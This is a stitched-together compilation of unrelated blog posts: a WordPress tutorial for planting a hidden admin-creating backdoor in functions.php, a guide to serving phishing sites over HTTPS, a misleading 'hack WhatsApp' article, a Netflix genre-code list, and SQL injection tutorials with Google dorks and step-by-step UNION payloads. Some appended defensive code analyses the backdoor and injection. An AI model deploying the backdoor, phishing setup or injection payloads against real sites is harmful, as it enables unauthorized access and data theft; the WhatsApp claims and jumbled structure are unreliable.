
How is backdoor created in WordPress ?


When the front door is closed, you might try the backdoor. This might sound like a malicious way of using the code for entering the site without having the access to it, but there are actually times when you need to control your own site if somebody stole it.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t even need your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

  1. Open your theme's functions.php file.
  2. Copy/paste the following code:

add_action('wp_head', 'wploop_backdoor');  // hooked to wp_head, so it runs on every front-end page load
function wploop_backdoor() {
        // the trigger is a plain query-string parameter, so every request for ?backdoor=hellomoto is recorded in the web server's access log
        if ($_GET['backdoor'] == 'hellomoto') {
                // only needed on WordPress older than 3.1; later versions load wp_create_user() by default and no longer ship this file, so require() fails there
                require('wp-includes/registration.php');
                if (!username_exists('name')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}

  3. Save your changes.

If you leave the code as it is, all you would have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=hellomoto

Once the page has loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘hellomoto’ to anything you come up with.

Try the function: not only is it fun, but it can really help you some time in the future when you're about to create a site for someone you can't trust completely.
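Seen from the defending side, the snippet above has a recognisable shape: a function registered on a front-end action that branches on a raw request parameter and ends in wp_create_user() plus set_role('administrator'), with no capability check anywhere. The scanner below, added here and not part of the original post, looks for exactly that shape in a theme's PHP. The functions.php it scans is a constructed sample (the hook-registered creator modelled on the snippet, next to a legitimate helper that checks current_user_can()); brace matching is good enough for theme files, and a real audit would use a PHP tokenizer instead.

```python
import re

# Constructed sample of a theme functions.php: the hook-registered admin creator
# modelled on the snippet above, plus a legitimate helper that checks capabilities.
SAMPLE_FUNCTIONS_PHP = r"""<?php
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
    if ($_GET['backdoor'] == 'hellomoto') {
        if (!username_exists('name')) {
            $user_id = wp_create_user('name', 'pass');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

// Legitimate: a caller with the create_users capability adds an editor account.
function theme_add_editor($login, $email) {
    if (!current_user_can('create_users')) {
        return false;
    }
    $user_id = wp_create_user($login, wp_generate_password(), $email);
    $user = new WP_User($user_id);
    $user->set_role('editor');
    return $user_id;
}
"""

FUNC_RE = re.compile(r"function\s+([A-Za-z_]\w*)\s*\(")
SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")
USER_CREATION = ("wp_create_user(", "wp_insert_user(")
ADMIN_ROLE_RE = re.compile(r"set_role\(\s*['\"]administrator['\"]\s*\)")


def extract_functions(source):
    """Yield (name, body) for each PHP function by matching braces."""
    for m in FUNC_RE.finditer(source):
        start = source.find("{", m.end())
        if start == -1:
            continue
        depth = 0
        for i in range(start, len(source)):
            if source[i] == "{":
                depth += 1
            elif source[i] == "}":
                depth -= 1
                if depth == 0:
                    yield m.group(1), source[start:i + 1]
                    break


def hook_for(source, func_name):
    """Return the action/filter name a function is registered on, or None."""
    pat = (r"add_(?:action|filter)\(\s*['\"]([\w/\-]+)['\"]\s*,\s*['\"]"
           + re.escape(func_name) + r"['\"]")
    m = re.search(pat, source)
    return m.group(1) if m else None


def scan_php(source):
    """Flag functions that create users or grant 'administrator' while branching
    on raw request input and never checking the caller's capability."""
    findings = []
    for name, body in extract_functions(source):
        reasons = []
        if any(g in body for g in SUPERGLOBALS):
            reasons.append("reads request superglobal")
        if any(c in body for c in USER_CREATION):
            reasons.append("creates a user")
        if ADMIN_ROLE_RE.search(body):
            reasons.append("grants administrator role")
        checks_capability = "current_user_can(" in body
        privileged = "reads request superglobal" in reasons and len(reasons) > 1
        if privileged and not checks_capability:
            findings.append({"function": name, "hook": hook_for(source, name), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_php(SAMPLE_FUNCTIONS_PHP):
        print(f"{f['function']} (hook: {f['hook']}): {', '.join(f['reasons'])}")
```

Run it over every .php file under wp-content/themes and wp-content/plugins; the hook name in each finding tells you how often the code executes (wp_head means every front-end page view), and the access log can then be searched for the parameter name the flagged function reads.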

SSL CERTIFICATE FROM LETSENCRYPT.ORG – SETUP GUIDE


OBTAINING AN SSL CERTIFICATE FROM LETSENCRYPT.ORG

Take this a step further: HTTPS should be implemented on all your phishing sites, regardless of whether they harvest sensitive data or not. You've got a much better chance of bypassing any web proxy servers in place by running a fully encrypted stream.

Phishing Frenzy now supports using an SSL Certificate and hosting your websites over HTTPS. Since Phishing Frenzy is essentially a front end for the Apache web service, you can upload your SSL certificate, activate the campaign and watch it all come to life over HTTPS. Now that’s legit.

How it Works

Let’s Encrypt has a nifty command line tool that we can run from our phishing server to quickly obtain our valid SSL certificate. The command line tool has now been renamed to “certbot” and can be downloaded off github here:

https://github.com/certbot/certbot

Once you’ve downloaded the script onto your server, it’s really a one-liner to get the SSL certificate in your possession.

The first item to note is that Apache cannot be running while you run certbot. In order for Let’s Encrypt to validate that you own the domain, it will resolve the FQDN to an IP address of the server you are currently on. Certbot will then start up a mini web service hosting a token which proves to Let’s Encrypt that you’re authoritative over this domain name.

This means that if you have any active phishing campaigns, they will be disabled temporarily while you obtain the SSL certificate. Keep this in mind to make sure you're not disrupting an active campaign of yours or a colleague's.

CONFIGURING APACHE

If you try to invoke the certbot script with Apache running you’ll be notified with a nice little warning like below:

[Image: SSL Certificate - Apache Already Running]

So once you’ve properly disabled your active web server, you can then run the “certbot” command similar to below. Make sure to tweak this for the domain name that you’re configuring.

./certbot-auto certonly --standalone -d www.pentestgeek.com

The standalone flag tells “certbot” to run a mini web service that authenticates with Let's Encrypt by hosting a web page temporarily. The “certonly” flag tells “certbot” that you don't want the tool to configure Apache with the SSL certificate automatically: just provide us the certificate files, and we'll deploy them to Apache ourselves through the Phishing Frenzy Web UI.

Once you've invoked this successfully, you are the proud new owner of a valid SSL certificate; congratulations. By default all of the certificate files are dropped into /etc/letsencrypt/live/:fqdn, which is really a symbolic link to the /etc/letsencrypt/archive/:fqdn directory, as seen below:

[Image: cert-directory]

CONFIGURING PHISHING FRENZY

Now that we have all of the SSL files required to host our phishing site over HTTPS, let's start Apache back up and jump back to our campaign within Phishing Frenzy. All we need to do is upload the SSL certificate as seen below and save. Make sure to assign the cert, key and chain correctly using the dropdowns on the right.

[Image: cert-upload]

Once this data has been uploaded and saved to the campaign properly, you can then activate the campaign and your phishing site is now live over HTTPS.  Anyone who tries to hit the phishing site over HTTP will be automatically redirected to HTTPS by default.

[Image: cert-valid-ssl]

Conclusion

If you’re not leveraging HTTPS for all your phishing engagements you should be. Letsencrypt.org is a great service and is changing the world of SSL certificate authorities. It’s no cost to you, and the tools are really slick to auto-magically configure your Nginx or Apache web server with a couple added flags.

In the future we may incorporate Let’s Encrypt into the Web UI itself so that it communicates with the Let’s Encrypt API to pull down the SSL certificate and apply it to the current campaign.

Hope you enjoyed, and enjoy phishing all the things over HTTPS.

Hack whatsapp messages without access to phone


WhatsApp Tracker allows Hackers to Intercept and Read Your Encrypted Messages

This method is perhaps the most appealing of them all. In essence, it uses a “backdoor” flaw.

Some say it is a severe mistake, while others claim it is an additional feature.

Anyway, it allows you to hack Whatsapp and to read the messages by intercepting them between users. The backdoor is used by Whatsapp, Telegram, and a few more apps.

First of all, we should explain the end-to-end encryption. It means that you, as a user will send an encrypted message to another person.

Only after it is received, it will be decrypted and readable. Whatsapp introduced this feature in 2012 and then became the most secure app of them all. Sadly, it looks like it isn’t so secure.

Whatsapp is owned by Facebook, and if we know that this giant allows central intelligence agencies to spy on its users, we can deduce that Whatsapp shares the same flaw.

That’s why the backdoor feature exists. Originally, it has been developed for central intelligence agencies, but at the same time, it is something that hackers can use.

Furthermore, Whatsapp end-to-end encryption works on “trust”. The company uses a secure server to process the messages, but according to the user agreement, they can change any of the rules at any given moment.

Basically, Whatsapp can choose to share your messages with others and you won’t know about it!

How does this actually work?

The vulnerability relies on the way WhatsApp behaves when an end user’s encryption key changes.

Basically, we have a scenario between a person A and a person B.

When person A sends a few messages to person B, Whatsapp on that device will decrypt the messages and allow the user to read them.

But, when a user B replaces the device, he will also be able to get and read those messages.

This is possible due to the fact that Whatsapp chose to update and modify the private keys needed for decryption at any given moment, without informing the user.

Now, you as a hacker will be user C. You will modify the private key of user B and insert your own.

By doing so, you will directly be able to read messages of user A. Whatsapp spy app that can do it for you isn’t so complicated to use, after all.

Here we have another advantage of this method. Facebook, which owns Whatsapp didn’t solve this issue since 2016. It is obvious that it will stay available in the future as well.

All of this means that you, as a hacker will be able to exploit this method in the near future. Using Whatsapp tracker online and using this method will give impressive results.

Some believe that the backdoor feature is used to eliminate the need for constant privacy key verification, which is annoying. Instead, Whatsapp will do it for you.

But, Signal private messenger, which uses the same technology is immune to this issue, simply due to the fact it requires physical verification.

If you are a decent hacker, you will be able to exploit this method or better said this drawback of the Whatsapp.

After all, it is introduced to allow for agencies to spy on users, which means that hackers, including yourself, can use it for the same reason.
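What the section above describes is, at bottom, a policy choice: what a messaging client does with messages that are still queued when the peer's identity key changes. The toy model below, added here and not part of the original article, contrasts the two policies the text mentions, re-encrypting the queue to the new key and delivering it without asking, versus holding the queue until the user has verified the new key. Key names are constructed labels, "encrypting to a key" is just a tag on the message, and no real cryptography is involved.

```python
from dataclasses import dataclass, field


@dataclass
class Message:
    body: str
    encrypted_to: str  # label of the identity key this ciphertext was made for (no real crypto)


@dataclass
class Recipient:
    name: str
    identity_key: str  # constructed label standing in for a public identity key


@dataclass
class Sender:
    """Toy sender holding the recipient's last-seen identity key and an outbox.
    policy: "reencrypt" = silently re-encrypt queued messages to a changed key;
            "hold"      = keep them queued until the user verifies the new key."""
    policy: str
    known_key: str
    outbox: list = field(default_factory=list)
    alerts: list = field(default_factory=list)

    def send(self, body):
        self.outbox.append(Message(body, encrypted_to=self.known_key))

    def _rekey(self, new_key):
        # Re-encrypt everything still queued to the new key and remember it.
        self.outbox = [Message(m.body, encrypted_to=new_key) for m in self.outbox]
        self.known_key = new_key

    def verify(self, recipient):
        """The user compared the new key out of band and accepted it."""
        self._rekey(recipient.identity_key)

    def flush(self, recipient):
        """Attempt delivery; returns the messages handed to the recipient."""
        if recipient.identity_key != self.known_key:
            self.alerts.append(f"{recipient.name}: key changed {self.known_key} -> {recipient.identity_key}")
            if self.policy == "hold":
                return []  # blocking: nothing leaves until the user verifies
            self._rekey(recipient.identity_key)  # non-blocking: carry on
        delivered, self.outbox = self.outbox, []
        return delivered


def readable_with(key, messages):
    """Only the holder of the key a message was encrypted to can read it."""
    return [m.body for m in messages if m.encrypted_to == key]


def simulate(policy):
    """A sends two messages while B is offline; before delivery B's device
    (and therefore identity key) is replaced. Returns what the new key can read."""
    bob = Recipient("B", "keyB1")
    alice = Sender(policy, bob.identity_key)
    alice.send("hello")
    alice.send("secret")
    bob.identity_key = "keyB2"  # new device registered for B
    delivered = alice.flush(bob)
    return {
        "read_by_new_key": readable_with("keyB2", delivered),
        "still_queued": len(alice.outbox),
        "alerts": list(alice.alerts),
    }


if __name__ == "__main__":
    for policy in ("reencrypt", "hold"):
        print(policy, simulate(policy))
```

Both policies raise the same alert; they differ only in whether the queued messages leave before anyone looks at it. Under "hold", delivery resumes only after verify() re-encrypts the outbox to the accepted key.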

Why Google Delivers More Targeted Results Than Other Search Engines

  • Like most of the major search engines, Google assembles the pages in its search index by using special “searchbot” or crawler software to scour the Web. Found pages are automatically added to Google’s ever-expanding database; when you perform a search, you’re actually searching this database of Web pages, not the Web itself.
  • The results of your Google searches are ranked according to Google’s trademarked PageRank technology. This technology measures how many other pages link to a particular page; the more links to a page, the higher that page ranks. In addition, PageRank assigns a higher weight to links that come from higher-ranked pages. So if a page is linked to from a number of high-ranked pages, that page will itself achieve a higher ranking.
  • The theory is that the more popular a page is, the higher that page’s ultimate value. While this sounds a little like a popularity contest (and it is), it’s surprising how often this approach delivers high-quality results.
  • The number of Web pages indexed by Google is among the largest of all search engines (Google and AllTheWeb are continually jockeying for “biggest” bragging rights), which means you stand a fairly good chance of actually finding what you were searching for. And the Google search engine is relatively smart; it analyzes the keywords in your query and recognizes the type of search result you’re looking for. (For example, if you enter a person’s name and city, it knows to search its phone book—not the general Web index.)

How to use secret Netflix codes to unlock hidden show and movie categories


SECRET codes can unlock shows and movies you never knew were hiding in the Netflix library. Here’s how to find them.

Netflix Secret Codes List

  • Action & Adventure: 1365
  • Action Comedies: 43040
  • Action Sci-Fi & Fantasy: 1568
  • Action Thrillers: 43048
  • Adult Animation: 11881
  • Adventures: 7442
  • African Movies: 3761
  • Alien Sci-Fi: 3327
  • Animal Tales: 5507
  • Anime: 7424
  • Anime Action: 2653
  • Anime Comedies: 9302
  • Anime Dramas: 452
  • Anime Fantasy: 11146
  • Anime Features: 3063
  • Anime Horror: 10695
  • Anime Sci-Fi: 2729
  • Anime Series: 6721
  • Art House Movies: 29764
  • Asian Action Movies: 77232
  • Australian Movies: 5230
  • B-Horror Movies: 8195
  • Baseball Movies: 12339
  • Basketball Movies: 12762
  • Belgian Movies: 262
  • Biographical Documentaries: 3652
  • Biographical Dramas: 3179
  • Boxing Movies: 12443
  • British Movies: 10757
  • British TV Shows: 52117
  • Campy Movies: 1252
  • Children & Family Movies: 783
  • Chinese Movies: 3960
  • Classic Action & Adventure: 46576
  • Classic Comedies: 31694
  • Classic Dramas: 29809
  • Classic Foreign Movies: 32473
  • Classic Movies: 31574
  • Classic Musicals: 32392
  • Classic Romantic Movies: 31273
  • Classic Sci-Fi & Fantasy: 47147
  • Classic Thrillers: 46588
  • Classic TV Shows: 46553
  • Classic War Movies: 48744
  • Classic Westerns: 47465
  • Comedies: 6548
  • Comic Book and Superhero Movies: 10118
  • Country & Western/Folk: 1105
  • Courtroom Dramas: 528582748
  • Creature Features: 6895
  • Crime Action & Adventure: 9584
  • Crime Documentaries: 9875
  • Crime Dramas: 6889
  • Crime Thrillers: 10499
  • Crime TV Shows: 26146
  • Cult Comedies: 9434
  • Cult Horror Movies: 10944
  • Cult Movies: 7627
  • Cult Sci-Fi & Fantasy: 4734
  • Cult TV Shows: 74652
  • Dark Comedies: 869
  • Deep Sea Horror Movies: 45028
  • Disney: 67673
  • Disney Musicals: 59433
  • Documentaries: 6839
  • Dramas: 5763
  • Dramas based on Books: 4961
  • Dramas based on real life: 3653
  • Dutch Movies: 10606
  • Eastern European Movies: 5254
  • Education for Kids: 10659
  • Epics: 52858
  • Experimental Movies: 11079
  • Faith & Spirituality: 26835
  • Faith & Spirituality Movies: 52804
  • Family Features: 51056
  • Fantasy Movies: 9744
  • Film Noir: 7687
  • Food & Travel TV: 72436
  • Football Movies: 12803
  • Foreign Action & Adventure: 11828
  • Foreign Comedies: 4426
  • Foreign Documentaries: 5161
  • Foreign Dramas: 2150
  • Foreign Gay & Lesbian Movies: 8243
  • Foreign Horror Movies: 8654
  • Foreign Movies: 7462
  • Foreign Sci-Fi & Fantasy: 6485
  • Foreign Thrillers: 10306
  • French Movies: 58807
  • Gangster Movies: 31851
  • Gay & Lesbian Dramas: 500
  • German Movies: 58886
  • Greek Movies: 61115
  • Historical Documentaries: 5349
  • Horror Comedy: 89585
  • Horror Movies: 8711
  • Independent Action & Adventure: 11804
  • Independent Comedies: 4195
  • Independent Dramas: 384
  • Independent Movies: 7077
  • Independent Thrillers: 3269
  • Indian Movies: 10463
  • Irish Movies: 58750
  • Italian Movies: 8221
  • Japanese Movies: 10398
  • Jazz & Easy Listening: 10271
  • Kids Faith & Spirituality: 751423
  • Kids Music: 52843
  • Kids’ TV: 27346
  • Korean Movies: 5685
  • Korean TV Shows: 67879
  • Late Night Comedies: 1402
  • Latin American Movies: 1613
  • Latin Music: 10741
  • Martial Arts Movies: 8985
  • Martial Arts, Boxing & Wrestling: 6695
  • Middle Eastern Movies: 5875
  • Military Action & Adventure: 2125
  • Military Documentaries: 4006
  • Military Dramas: 11
  • Military TV Shows: 25804
  • Miniseries: 4814
  • Mockumentaries: 26
  • Monster Movies: 947
  • Movies based on children’s books: 10056
  • Movies for ages 0 to 2: 6796
  • Movies for ages 2 to 4: 6218
  • Movies for ages 5 to 7: 5455
  • Movies for ages 8 to 10: 561
  • Movies for ages 11 to 12: 6962
  • Music & Concert Documentaries: 90361
  • Music: 1701
  • Musicals: 13335
  • Mysteries: 9994
  • New Zealand Movies: 63782
  • Period Pieces: 12123
  • Political Comedies: 2700
  • Political Documentaries: 7018
  • Political Dramas: 6616
  • Political Thrillers: 10504
  • Psychological Thrillers: 5505
  • Quirky Romance: 36103
  • Reality TV: 9833
  • Religious Documentaries: 10005
  • Rock & Pop Concerts: 3278
  • Romantic Comedies: 5475
  • Romantic Dramas: 1255
  • Romantic Favorites: 502675
  • Romantic Foreign Movies: 7153
  • Romantic Independent Movies: 9916
  • Romantic Movies: 8883
  • Russian: 11567
  • Satanic Stories: 6998
  • Satires: 4922
  • Scandinavian Movies: 9292
  • Sci-Fi & Fantasy: 1492
  • Sci-Fi Adventure: 6926
  • Sci-Fi Dramas: 3916
  • Sci-Fi Horror Movies: 1694
  • Sci-Fi Thrillers: 11014
  • Science & Nature Documentaries: 2595
  • Science & Nature TV: 52780
  • Screwball Comedies: 9702
  • Showbiz Dramas: 5012
  • Showbiz Musicals: 13573
  • Silent Movies: 53310
  • Slapstick Comedies: 10256
  • Slasher and Serial Killer Movies: 8646
  • Soccer Movies: 12549
  • Social & Cultural Documentaries: 3675
  • Social Issue Dramas: 3947
  • Southeast Asian Movies: 9196
  • Spanish Movies: 58741
  • Spiritual Documentaries: 2760
  • Sports & Fitness: 9327
  • Sports Comedies: 5286
  • Sports Documentaries: 180
  • Sports Dramas: 7243
  • Sports Movies: 4370
  • Spy Action & Adventure: 10702
  • Spy Thrillers: 9147
  • Stage Musicals: 55774
  • Stand-up Comedy: 11559
  • Steamy Romantic Movies: 35800
  • Steamy Thrillers: 972
  • Supernatural Horror Movies: 42023
  • Supernatural Thrillers: 11140
  • Tearjerkers: 6384
  • Teen Comedies: 3519
  • Teen Dramas: 9299
  • Teen Screams: 52147
  • Teen TV Shows: 60951
  • Thrillers: 8933
  • Travel & Adventure Documentaries: 1159
  • TV Action & Adventure: 10673
  • TV Cartoons: 11177
  • TV Comedies: 10375
  • TV Documentaries: 10105
  • TV Dramas: 11714
  • TV Horror: 83059
  • TV Mysteries: 4366
  • TV Sci-Fi & Fantasy: 1372
  • TV Shows: 83
  • Urban & Dance Concerts: 9472
  • Vampire Horror Movies: 75804
  • Werewolf Horror Movies: 75930
  • Westerns: 7700
  • World Music Concerts: 2856
  • Zombie Horror Movies: 75405

SQL Injection : How It Works


Introduction

Let's get started at an apparently unrelated point. Let's assume we create a table in SQL. Now, there are three main parts to a database management system like SQL. They are:

  • Creating structure of table
  • Entering data
  • Making queries (and getting meaningful results from data)
Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in a table with columns like Name, Price, Company, Screen Size, OS, etc.
Now they allow you to create a query using some sort of user-friendly drop-down form which lets you select your budget, preferred company, etc. So basically you, the user, can create queries and request data from their SQL servers.
While this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. A URL ending in .php is a direct indication that the website/blog uses SQL to deliver a lot of its data, and that you can execute queries directly by changing the URL. Now, basically, the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn't understand what to do, and returns an error. This is a clear indication that with proper coding, we can send queries that will make the database ‘go berserk’ and malfunction, and give us all the otherwise private data in its tables. This attack can be used to obtain confidential data like a list of usernames and passwords of all users on a website.

Steps

  1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability.
  2. After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. Then we should obtain information about SQL version and the number of tables in database and columns in the tables.
  3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial)
For the 2nd and 3rd steps, there are two ways to do them:
  • Manually, using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command:

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query “UserId = 105” may not be true for all users, the condition 1=1 will always be true. So basically the query will return all the data about the user for every user for whom 1=1 holds, i.e. for all of them. Effectively, you have the usernames and passwords and all other information about all the users of the website.

The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts.
  • Using some tool – Some tools help in making the process easier. You still have to use commands, but using tools is much more practical once you have an idea of what is actually happening. I don't recommend all the GUI Windows tools which are found on malware-filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali Linux installed. In Kali Linux, there is a great tool called SQLMap that we'll be using.
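The "or 1=1" query above only works because the user's input is pasted into the SQL text and so becomes part of the statement's grammar. The example below, added here and not taken from the tutorial, shows that mechanism end to end on an in-memory SQLite database with three constructed rows (the "srinivas" account is borrowed from the text): the same lookup written by string concatenation, with a bound parameter, and with integer validation in front of the bound parameter.

```python
import sqlite3


def make_db():
    """In-memory Users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Name TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(105, "srinivas", "s3cret"), (106, "alice", "hunter2"), (107, "bob", "pa55w0rd")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Builds the statement by concatenating the raw input, exactly the pattern
    the page's example exploits: the input becomes part of the SQL grammar."""
    sql = "SELECT UserId, Name FROM Users WHERE UserId = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter: whatever the input contains, it is
    compared as a single value and can never change the statement's structure."""
    return conn.execute("SELECT UserId, Name FROM Users WHERE UserId = ?", (user_id,)).fetchall()


def lookup_validated(conn, user_id):
    """Belt and braces: reject anything that is not an integer before querying."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []
    return lookup_parameterized(conn, uid)


if __name__ == "__main__":
    db = make_db()
    benign, hostile = "105", "105 or 1=1"
    print("vulnerable, benign:    ", lookup_vulnerable(db, benign))
    print("vulnerable, hostile:   ", lookup_vulnerable(db, hostile))
    print("parameterized, hostile:", lookup_parameterized(db, hostile))
    print("validated, hostile:    ", lookup_validated(db, hostile))
```

With the hostile input the concatenated version returns every row, while the parameterized version compares the integer column against the literal string "105 or 1=1" and matches nothing; the error messages the tutorial relies on never appear either, because no malformed SQL is ever sent.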
That’s it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.

Hacking Websites Using SQL Injection Manually


Sql Injection – Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don’t need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

[Image: SQL Injection]

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so; the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
A more specific definition could be “Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.” (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don’t mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:”products.php?prodID=”

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl operator instructs Google to look at the URLs in its search index and provide us with the ones which have a specific string in them. Inside the inverted commas is the specific URL fragment which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses a SQL database. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a SQL injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don’t know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

Now let's assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is put a single quote (') at the end of the URL instead of 25. The URL would look somewhat like this: www.site.com/products.php?prodID='
If you are lucky, then the site would be vulnerable. If it is, then there would be some kind of error showing up, which would have words like “Not found”, “Table”, “Database”, “Row”, “Column”, “Sql”, “MySQL” or anything related to a database. In some cases, there would be no error, but there would be some berserk/unexpected behavior on the page, like a few components not showing up properly, etc.
[Image: A typical error message]

But right now you only know that the site is vulnerable. You still have to find which columns/rows are vulnerable.

Finding number of columns/rows

Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.
www.site.com/products.php?prodID=25+order+by+1
Effectively, we added order by 1 to the end of the original URL. If there is at least one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Let's assume you get an error for
www.site.com/products.php?prodID=25+order+by+6
This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things:
  • The site is vulnerable to SQL injection
  • It has 5 columns
Now you need to know which of the columns is vulnerable

Finding Vulnerable columns

Now let's assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. To find out which of the columns is vulnerable, enter the following into the URL:
www.site.com/products.php?prodID=25+union+select+1,2,3,4,5
In some cases you might need to put a minus sign (-) before the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.
Let’s say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.
Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.

Unification

From here on, the things will get tough if you are not able to follow what I’m doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is
The actual vulnerability is here
Notice that the URL has the structure that you now know well. If used properly, a Google dork could have led us to this site as well. Now we will replace the 1 with a single quote (').
[Image: This is what your vulnerable page looks like to start with]
As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.
12 columns. Error….

So there was an error on the 12th column. This means there were 11 columns in total. So to find the vulnerable column, we have to execute:

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Now we can see total four numbers on the page. 11,7,2 and 9. It won’t be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pictures with and without the error, we can easily say that the unexpected element in the malfunctioning page is the number 11. We can conclude that the 11th column is the vulnerable one. These kinds of deductions make hacking very interesting and remind you it's more about logic and creativity than about learning useless code by rote.
Now we are finally where we left off before we changed our stream. We need to find the SQL version. It can sometimes be very tricky. But let's hope it's not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you’ll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

Now the method to extract data is different depending on the version. Luckily it's easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the tables is present in the information schema. This is what we're gonna look at first.
In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

